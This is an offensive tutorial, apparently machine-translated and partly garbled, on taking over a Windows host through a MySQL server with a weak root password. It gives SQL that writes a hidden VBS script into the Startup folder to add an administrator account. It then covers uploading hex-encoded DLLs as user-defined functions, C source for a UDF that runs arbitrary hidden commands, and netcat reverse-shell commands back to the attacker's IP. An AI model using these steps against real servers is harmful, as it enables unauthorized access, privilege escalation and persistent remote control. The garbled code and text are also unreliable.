Detailed mysql Weak Password Attack Process

Next, we will only talk about the warehouse receiving process. I have already learned how to write vbs, because it is a tutorial that also tells you how to be a good friend and how to make it safe, for more information, see.

Next, we will only talk about the warehouse receiving process. I have already learned how to write vbs, because it is a tutorial that also tells you how to be a good friend and how to make it safe, for more information, see.

1. Connect to the MYSQL server-u root-h 192.168.0.1mysql.exe. This program is in the BIN directory where you installed MYSQL.

2. let's take a look at some mysql> show databases on the server. By default, MYSQL and TEST databases are installed. If you see other databases, they are user-created databases.

3. Let's go to mysql> use test; we will go to the test database.

4. Check the tables mysql> show tables in the database. By default, no tables exist in test.

The following are key parts:
5. create a new table under the TEST database; mysql> create table a (cmd text); well, we have created a new table named a, which stores only one field, the field name is cmd, Which is text.

6. insert content into the table

Reference

The Code is as follows:
Mysql> insert into a values ("set wshshell = createobject (" "wscript. shell "")"); Mysql> insert into a values ("a = wshshell. run (" "cmd.exe/c net user 1/add" ", 0 )"); Mysql> insert into a values ("B = wshshell. run (" "cmd.exe/c net localgroup Administrators 1/add" ", 0 )");

Note that double quotation marks, Parentheses, and "0" must be entered! We will use these three commands to create a VBS script program!

7. now let's take a look at some mysql> * from a in table a. We will see three rows of data in the table, that is, the content we just entered. After confirming that the content you entered is correct, next step

8. The output table is a VBS script file mysql> select * from a into outfile "c: \ docume ~ 1 \ alluse ~ 1 \ Start Menu \ Program \ Start \ a. vbs "; we input the content in our table into the Startup Group, which is a VBS script file! Note the "" symbol.

9. You will surely know that you can use MYSQL to output an executable file. Why not use BAT, because there will be an obvious DOS window at startup, and the VBS script can completely hide the window without any error prompt! The script should have been deleted automatically after the script is completed, but the Chinese directory cannot be processed! Okay. Find a tool attack 135 to restart the server.

The following describes the operations performed by netizens.

Next, let's talk about how to generate a script to upload a binary file. Look at the mysql script code (the method used by Mix ):
　

The Code is as follows:

Set @ a = concat ('', 0x0123abc1312389 .....); Set @ a = concat (@ a, 0x00008978abc545e ......); ...................... Create table Mix (data LONGBLOB); // create table Mix. The field is data and the type is longblob. Insert into Mix values (""); update Mix set data = @ a; // @ a insert Table Mix Select data from Mix into DUMPFILE 'C: \ Winnt \ filename '; // the content of the exported table is a file

The first two sentences are very familiar. This is the solution that we used to bypass during the injection and declare the hexadecimal number of the Code to a variable, then, import the variable. Here, because the hexadecimal code is the content of a file and the code is too long, the concat function is used to add up the previous Code class, in this way, it is accumulated into a variable. The following sentence is simple. I have comments.

How can I upload a script generated? Log on to the mysql server first:
　

The Code is as follows:

C:> mysql-u root-h hostip-p Mysql> use mysql; // enter the default database of mysql first. Otherwise, you will not know which database the next table belongs. Mysql>. E: * .dll.txt; // here is your mysql script After entering the command above, you can see that the screen text is flashing fast (of course, the network speed is fast). Soon your file will be uploaded! Next we will focus on what dll files should we upload? Now I can see two dll files on the Internet, one being Mix. dll, one is my_udf.dll written by envymask. I have used both of them, both of which are good, but they are also a little inadequate. Let's take a look at the specific use process! Use mix. dll first: Log on to mysql and enter the following command: Mysql>. e: mix.dll.txt; Mysql> Create FUNCTION Mixconnect returns string soname 'C: \ windows \ mix. dll '; // The registered Mixconnect here is the function implemented in our dll file. We will use it to execute system commands! Mysql> select Mixconnect ('your ip', '000000'); // enter your bounce ip address and port

After a while, when you listen to the nc on port 8080, you will get a shell with system permissions! 1:
This is really good. Through the rebound, shell can pass through some firewalls. Unfortunately, this function is not well written and can only be executed once. After you connect to the database for the second time, when you run "select Mixconnect ('your ip', '123');" again, the mysql of the other party will be taken away! An error is reported, and the service is stopped!
Therefore, you have only one success to use mix. dll, and there is no chance to try again! In addition, according to my test, he does not seem to work on Win2003's system.
　

The Code is as follows:

Use my_udf.dll: Mysql>. C: my_udf.dll.txt Mysql> Create FUNCTION my_udfdoor returns string soname 'C: \ winnt \ my_udf.dll '; // Similarly, my_udfdoor is also used to execute the system command function after we register it. Mysql> select my_udfdoor (''); // you can enter the my_udfdoor parameter here, which is equivalent to activating this function. Now you don't need to shut down the shell. Let's open another cmd and use: D:> nc hostip 3306 *

4. 0. *-nt x $ Eo ~ MCG f ** k // after you see this, enter "f ** k", which is the default password of my_udfdoor and cannot be changed by yourself
After a while, you will have shell with system permissions,
He is a hook recv version, so he has a strong ability to penetrate the wall. I used this when the previous mix. dll failed to rebound. He really did not expect it! After entering the system, I found that it has a dual network card, which is V2.73 of the Alibaba Cloud firewall Personal Edition. It only opens port 3306 to the outside. Thus, my_udf.dll has a strong ability to penetrate the firewall! But he also has a bug, that is, after we connect to activate this function (that is, after the command "select my_udfdoor (''); "is used), whether or not you connect, as long:
Mysql> drop function my_udfdoor; then, mysql reports an error and then fails,
Therefore, you cannot delete your traces when using this dll file!
Finally, we can write a custom dll file. Check whether the problem can be solved.
We only need to use the udf sample of mysql as a template! Let's look at his example:
　　

The Code is as follows:
# I nclude # I nclude # I nclude Extern "C "{ Char * my_name (UDF_INIT * initid, UDF_ARGS * args, char * is_null, Char * error ); // Compatible with C } Char * my_name (UDF_INIT * initid, UDF_ARGS * args, char * is_null, Char * error) { Char * me = "my name "; Return me; // Call this UDF to return my name }

Is it very simple? Well, we only need to modify it to have our own dll file:
Here is a modified Crackme:
　　

The Code is as follows:

# I nclude # I nclude # I nclude "mysql. h" Extern "C" _ declspec (dllexport) char * sys_name (UDF_INIT * initid, UDF_ARGS * args, char * is_null, char * error); // sys_name is the function name, you can modify _ Declspec (dllexport) char * sys_name (UDF_INIT * initid, UDF_ARGS * args, char * is_null, char * error) // Of course, sys_name here must also be changed! { Char me [256] = {0 }; If (args-> arg_count = 1 ){ Strncpy (me, args-> args [0], args-> lengths [0]); Me [args-> lengths [0] = '\ 0 '; WinExec (me, SW_HIDE); // It is used to execute arbitrary commands } Else Strcpy (me, "do nonthing. n "); Return me; }

Okay, we can compile it into the sysudf. dll file! Let's use him to experiment!
View operation:
　

The Code is as follows:
Mysql>. C: sysudf.dll.txt Mysql> Create function sys_name returns string soname 'C: \ windows \ sysudf. dll '; Mysql>. Nc.exe.txt // upload nc.exe. Mysql> select sys_name('nc.exe-e cmd.exe my ip address 100 '); // There is only one sys_name parameter, which specifies the system command to be executed

Okay. Let's see a reverse shell in Win2003,
Of course, you can also run other commands without Rebounding the shell. However, no echo is displayed whether the command is executed successfully or not, so make sure that the command format is correct. After testing this dll file, no error will be reported no matter when "drop function sys_name;" is returned. You can also run different commands multiple times. As for his weakness, he is not too strong in the ability to penetrate the wall as well as Mix. dll, but for a wall that is really hard to penetrate, it is the best choice to run other commands directly.